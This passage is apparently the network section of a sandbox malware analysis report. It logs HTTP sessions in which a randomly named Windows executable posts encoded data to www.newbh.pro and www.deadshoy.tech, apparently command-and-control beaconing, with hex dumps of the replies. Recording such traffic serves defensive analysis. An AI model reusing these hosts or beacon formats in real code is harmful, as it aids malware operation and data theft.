6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 67 32 56 36 52 51 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 62 59 74 58 69 6e 4c 64 36 62 66 4f 44 56 4d 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 49 48 44 49 52 70 6f 36 53 50 6e 35 63 59 77 75 58 68 65 36 34 38 51 31 6c 49 63 72 71 56 67 33 72 58 33 67 54 46 30 65 64 53 4b 30 37 30 5a 74 50 37 72 66 6f 50 57 46 46 6d 52 55 73 6f 58 79 72 48 6a 75 38 66 5a 59 2b 2b 74 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?g2V6RQ=kDkUHRN5t7dj/L6pbYtXinLd6bfODVMZ28RJcX0ruebcxps2UknIHDIRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfoPWFFmRUsoXyrHju8fZY++tHlaKveA/Dc6mrH&Dlp=xkAs2">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49981	176.57.65.76	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:09.488677025 CET	802	OUT	POST /67jc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/67jc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 35 4b 4c 77 66 70 6c 59 79 32 32 6e 71 70 50 63 41 6e 4d 32 37 63 52 67 62 6d 73 45 6c 34 2b 79 6e 36 56 6b 4d 69 66 72 45 56 41 58 72 34 79 65 50 48 56 41 53 52 57 47 6c 49 4b 43 6a 44 51 47 4b 6f 4c 78 55 47 4c 73 61 6d 31 4c 4a 46 37 79 66 4c 30 71 6f 37 67 53 77 49 44 38 47 68 56 71 78 79 34 2f 6f 54 2b 49 65 7a 33 67 5a 49 74 47 75 74 72 33 61 71 79 62 48 73 4c 49 6b 32 61 65 73 65 53 68 56 56 63 50 39 67 6f 6a 54 31 48 65 58 72 2f 44 4c 77 6a 4f 78 2f 58 67 4c 63 62 31 4a 6d 63 34 43 36 62 34 69 35 33 68 43 4a 71 39 6b 47 72 73 79 75 52 68 57 45 32 65 49 69 35 6b 74 68 79 6e 51 46 55 6e 75 5a 52 33 32 52 71 6e Data Ascii: Kd=pBM0ElNuzp5D5KLwfplYy22nqpPcAnM27cRgbmsEl4+yn6VkMifrEVAXr4yePHVASRWGlIKCjDQGKoLxUGLsam1LJF7yfL0qo7gSwID8GhVqxy4/oT+Iez3gZItGutr3aqybHsLIk2aeseShVVcP9gojT1HeXr/DLwjOx/XgLcb1Jmc4C6b4i53hCJq9kGrsyuRhWE2eIi5kthynQFUnuZR32Rqn
Jan 11, 2025 05:43:10.145284891 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=okqDW77tDfyktH1Z; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:09 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:09 GMT Set-Cookie: __ddg10_=1736570589; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:09 GMT Set-Cookie: __ddg1_=gOhZj4m3OTtBsTkA0CRT; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:43:09 GMT date: Sat, 11 Jan 2025 04:43:10 GMT content-type: text/html; charset=iso-8859-1 content-length: 434 location: https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7zp8UXbla9DQDRTX/tvbK76/&Ay2=aOpadip2p x-host: www.newbh.pro x-tilda-server: 28 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 32 58 50 44 31 58 61 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 61 73 6c 34 33 33 50 43 68 71 6a 63 56 45 4d 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 43 45 32 6c 51 6a 59 4c 65 49 56 52 50 59 31 57 54 69 72 65 4b 68 67 35 6b 49 49 4c 6c 44 68 6a 6d 61 55 45 58 49 30 44 31 56 72 73 6f 2b 38 56 32 38 63 33 68 50 55 74 48 6b 43 35 6c 68 32 4b 69 53 79 2b 2b 66 71 42 35 39 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7
Jan 11, 2025 05:43:10.145339012 CET	72	IN	Data Raw: 7a 70 38 55 58 62 6c 61 39 44 51 44 52 54 58 2f 74 76 62 4b 37 36 2f 26 61 6d 70 3b 41 79 32 3d 61 4f 70 61 64 69 70 32 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: zp8UXbla9DQDRTX/tvbK76/&Ay2=aOpadip2p">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49982	176.57.65.76	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:12.038273096 CET	1819	OUT	POST /67jc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/67jc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 35 4b 4c 77 66 70 6c 59 79 32 32 6e 71 70 50 63 41 6e 4d 32 37 63 52 67 62 6d 73 45 6c 35 71 79 6e 73 4a 6b 50 41 33 72 46 56 41 58 31 49 79 66 50 48 56 52 53 58 2b 61 6c 49 57 30 6a 41 34 47 4c 4e 48 78 44 69 6e 73 51 6d 31 4c 4c 46 37 7a 52 72 30 7a 6f 37 78 36 77 4d 6e 38 47 68 56 71 78 31 41 2f 68 6d 4b 49 53 54 33 68 59 49 74 4b 71 74 72 54 61 73 61 4c 48 73 66 48 6b 48 36 65 69 66 2b 68 58 6e 30 50 2b 41 6f 68 55 31 47 44 58 72 37 59 4c 77 2f 6b 78 2f 54 61 4c 62 76 31 4c 6d 51 6d 61 61 50 34 34 61 69 41 50 34 54 66 38 57 7a 35 73 4f 4a 5a 54 6b 71 4b 55 42 52 51 6a 48 4f 65 5a 33 5a 52 78 2f 59 69 32 6e 4c 2f 48 42 50 44 76 49 79 4f 72 6b 6d 6f 36 75 70 53 34 54 59 6e 75 4a 55 76 4f 68 46 46 5a 6e 73 32 4c 37 2f 53 6f 49 6c 35 4e 44 30 44 45 54 34 55 31 77 37 32 6a 6c 55 78 63 66 37 75 5a 78 63 41 30 49 72 53 46 6c 76 75 39 43 56 62 4b 64 78 38 6f 6b 7a 55 62 49 59 44 42 6f 66 48 4f 4b 52 74 36 6f 77 2b 68 51 45 58 46 50 78 48 4d 4a 4a 67 62 67 69 [TRUNCATED] Data Ascii: Kd=pBM0ElNuzp5D5KLwfplYy22nqpPcAnM27cRgbmsEl5qynsJkPA3rFVAX1IyfPHVRSX+alIW0jA4GLNHxDinsQm1LLF7zRr0zo7x6wMn8GhVqx1A/hmKIST3hYItKqtrTasaLHsfHkH6eif+hXn0P+AohU1GDXr7YLw/kx/TaLbv1LmQmaaP44aiAP4Tf8Wz5sOJZTkqKUBRQjHOeZ3ZRx/Yi2nL/HBPDvIyOrkmo6upS4TYnuJUvOhFFZns2L7/SoIl5ND0DET4U1w72jlUxcf7uZxcA0IrSFlvu9CVbKdx8okzUbIYDBofHOKRt6ow+hQEXFPxHMJJgbgiMry4JhHAnROiwgoD5ORqVjL7uUscQ1I5BxcQjexZ8UXclx8SbO7/OKjTwk5MisbDg4b7ZoX4R+pZ9w57f74FEDGYaCEtt5RDnEOXwoGpQXwykSwJ++IivnpsnkEDUx5dcwH1wAODCmMEdxN/BsRoetU8fpA0QH5cISdnHVLebuFr0ASMRMFYO9++hIY2u/hwDq4rkCOQw+TGYu2+M7UlhXXtBcvaHLIUC3dOhSZ3calzd59Zoue4xYzpnUhTsk9cMCnqndl40jaqJ8AG6J3Si9z91/tQFCNXsI9dJzTbl8v1QW3EOLoU/5mOGcjYmN3JKIPyNNXUQpggCvow/U+vbTRftBqor4X1Hz4g8pr0KFa0LjSumop+Ep2z7yc3/D2C3YHLN5nlnj273yH1Ti3yhuAyPJrSWQ2l/zBacbwfXwkJosHI59vF0Rx7fbYZ7BO3xO9tLkn45Rh/isnQKerMilg9RbccLphK9QBiZCHQG08Lm6k4H4restG6FNeqnL7S7JEh7QRDPFVCa2LOpuSFlTQmIW4l9xHmo8gvr/TpaLurNgfTJspiyJ6x/+aUgHic3TCFYPxTxVY2uuJKSU6nUvszC1DP6iFFa5AkMVcdZjPiWVw03LE+yylTomjb+NGYVSiMrgV9R1hZXb3QTabkyRqqx+ABwJBi91 [TRUNCATED]
Jan 11, 2025 05:43:12.788621902 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=QJIEhNyBblM76bUM; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:12 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:12 GMT Set-Cookie: __ddg10_=1736570592; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:12 GMT Set-Cookie: __ddg1_=Xko9DZ7i2SaAEVX4XN1l; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:43:12 GMT date: Sat, 11 Jan 2025 04:43:12 GMT content-type: text/html; charset=iso-8859-1 content-length: 398 location: https://www.newbh.pro/67jc/?9q=kDkUHRN5t7dj/L6pc8lH0GPd96jYDQYZ28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfqPldvlSkagjeTfhW8fZZ/+tLDeK2GJow=&vz540=4-i1fuWxgwuZ x-ws-id: 2 x-host: www.newbh.pro x-tilda-server: 9 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 39 71 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 63 38 6c 48 30 47 50 64 39 36 6a 59 44 51 59 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 49 48 44 4d 52 70 6f 36 53 50 6e 35 63 59 77 75 58 68 65 36 34 38 51 31 6c 49 63 72 71 56 67 33 72 58 33 67 54 46 30 65 64 53 4b 30 37 30 5a 74 50 37 72 66 71 50 6c 64 76 6c 53 6b 61 67 6a 65 54 66 68 57 38 66 5a 5a 2f 2b 74 4c 44 65 4b [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?9q=kDkUHRN5t7dj/L6pc8lH0GPd96jYDQYZ28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfqPldvlSkagjeTfhW8fZZ/+tLDeK2GJow=&vz540=4-i1fuWxgwuZ">here</a>.</p></bo
Jan 11, 2025 05:43:12.788652897 CET	11	IN	Data Raw: 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: dy></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49984	176.57.65.76	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:14.578758955 CET	532	OUT	GET /67jc/?Kd=kDkUHRN5t7dj/L6paso6inXd6eXYDn0Z28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rZWhdfVOSSLsn1Z1cw9XoFAJblBc0qH/JGhW5RY1Iq+2JBw==&Gr=hRRPf2Bx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.newbh.pro User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:43:15.266638041 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=Lm4oYy5ea3QgpLl1; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:15 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:15 GMT Set-Cookie: __ddg10_=1736570595; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:15 GMT Set-Cookie: __ddg1_=sAURgEr87p7W8v63hgTe; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:43:15 GMT date: Sat, 11 Jan 2025 04:43:15 GMT content-type: text/html; charset=iso-8859-1 content-length: 434 location: https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7zp8UXbla9DQDRTX/tvbK76/&Ay2=aOpadip2p x-host: www.newbh.pro x-tilda-server: 28 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 32 58 50 44 31 58 61 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 61 73 6c 34 33 33 50 43 68 71 6a 63 56 45 4d 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 43 45 32 6c 51 6a 59 4c 65 49 56 52 50 59 31 57 54 69 72 65 4b 68 67 35 6b 49 49 4c 6c 44 68 6a 6d 61 55 45 58 49 30 44 31 56 72 73 6f 2b 38 56 32 38 63 33 68 50 55 74 48 6b 43 35 6c 68 32 4b 69 53 79 2b 2b 66 71 42 35 39 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7
Jan 11, 2025 05:43:15.266661882 CET	72	IN	Data Raw: 7a 70 38 55 58 62 6c 61 39 44 51 44 52 54 58 2f 74 76 62 4b 37 36 2f 26 61 6d 70 3b 41 79 32 3d 61 4f 70 61 64 69 70 32 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: zp8UXbla9DQDRTX/tvbK76/&Ay2=aOpadip2p">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49985	199.59.243.228	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:20.377880096 CET	794	OUT	POST /k45z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.deadshoy.tech Origin: http://www.deadshoy.tech Referer: http://www.deadshoy.tech/k45z/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 4b 6a 48 56 4c 33 65 45 6c 66 44 53 30 6c 69 37 45 41 6f 4b 67 63 57 4e 35 6d 4b 70 6a 74 7a 52 64 32 48 6b 48 64 36 48 38 50 47 42 43 55 79 34 67 65 39 41 71 7a 6a 46 35 32 65 74 4e 72 77 69 45 68 75 62 7a 59 6a 44 6d 7a 54 4a 4d 49 69 6f 71 5a 52 79 68 65 63 4b 49 66 2f 67 78 4b 78 36 72 57 6b 79 55 70 73 6d 45 5a 47 68 54 46 4b 69 77 48 4b 39 58 52 77 52 68 38 4b 39 47 4c 6e 5a 78 37 41 78 62 31 35 2f 65 68 4c 7a 69 54 56 39 45 34 31 61 71 77 59 64 65 45 52 51 75 42 44 53 78 61 6c 52 67 35 72 41 73 51 6b 66 64 44 64 73 4b 2b 7a 58 2b 6f 6c 33 78 41 53 78 42 65 2f 55 75 41 55 53 46 66 77 3d Data Ascii: Kd=KjHVL3eElfDS0li7EAoKgcWN5mKpjtzRd2HkHd6H8PGBCUy4ge9AqzjF52etNrwiEhubzYjDmzTJMIioqZRyhecKIf/gxKx6rWkyUpsmEZGhTFKiwHK9XRwRh8K9GLnZx7Axb15/ehLziTV9E41aqwYdeERQuBDSxalRg5rAsQkfdDdsK+zX+ol3xASxBe/UuAUSFfw=
Jan 11, 2025 05:43:20.831521988 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:43:20 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 5f1ef0e2-ab49-42ee-8c0e-0971ed79605d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig== set-cookie: parking_session=5f1ef0e2-ab49-42ee-8c0e-0971ed79605d; expires=Sat, 11 Jan 2025 04:58:20 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 74 65 32 7a 37 74 43 72 6c 7a 46 58 43 69 67 66 6f 74 34 77 6a 41 41 64 77 4c 2f 6f 70 31 76 30 45 6f 54 42 43 70 6a 45 46 53 30 38 35 72 2b 38 36 7a 44 68 6f 4c 6e 76 7a 2b 46 61 4d 58 61 65 63 65 6e 62 65 47 49 76 6b 77 32 64 33 77 71 39 2f 46 42 69 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:43:20.831548929 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWYxZWYwZTItYWI0OS00MmVlLThjMGUtMDk3MWVkNzk2MDVkIiwicGFnZV90aW1lIjoxNzM2NTcwNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49986	199.59.243.228	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:22.925904989 CET	814	OUT	POST /k45z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.deadshoy.tech Origin: http://www.deadshoy.tech Referer: http://www.deadshoy.tech/k45z/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 4b 6a 48 56 4c 33 65 45 6c 66 44 53 32 47 36 37 43 6a 77 4b 73 73 57 4d 6c 32 4b 70 36 39 7a 56 64 32 62 6b 48 63 2b 58 38 38 69 42 46 30 43 34 68 66 39 41 74 7a 6a 46 78 57 65 69 54 62 77 54 45 68 71 31 7a 59 50 44 6d 7a 48 4a 4d 4a 53 6f 70 71 35 31 67 4f 63 55 52 76 2f 69 2f 71 78 36 72 57 6b 79 55 74 38 41 45 61 32 68 54 31 36 69 32 6a 2b 36 61 78 77 51 6f 63 4b 39 43 4c 6e 64 78 37 41 66 62 78 35 56 65 6a 44 7a 69 57 78 39 45 73 5a 5a 7a 41 59 62 64 30 51 4f 70 67 75 57 31 73 78 73 71 37 65 37 73 77 67 43 63 31 73 47 51 63 37 2f 74 49 4a 50 68 54 61 47 51 75 65 39 30 6a 45 69 62 49 6e 56 57 77 67 68 62 4b 59 65 53 2f 6a 4c 31 76 73 4a 54 32 53 46 Data Ascii: Kd=KjHVL3eElfDS2G67CjwKssWMl2Kp69zVd2bkHc+X88iBF0C4hf9AtzjFxWeiTbwTEhq1zYPDmzHJMJSopq51gOcURv/i/qx6rWkyUt8AEa2hT16i2j+6axwQocK9CLndx7Afbx5VejDziWx9EsZZzAYbd0QOpguW1sxsq7e7swgCc1sGQc7/tIJPhTaGQue90jEibInVWwghbKYeS/jL1vsJT2SF
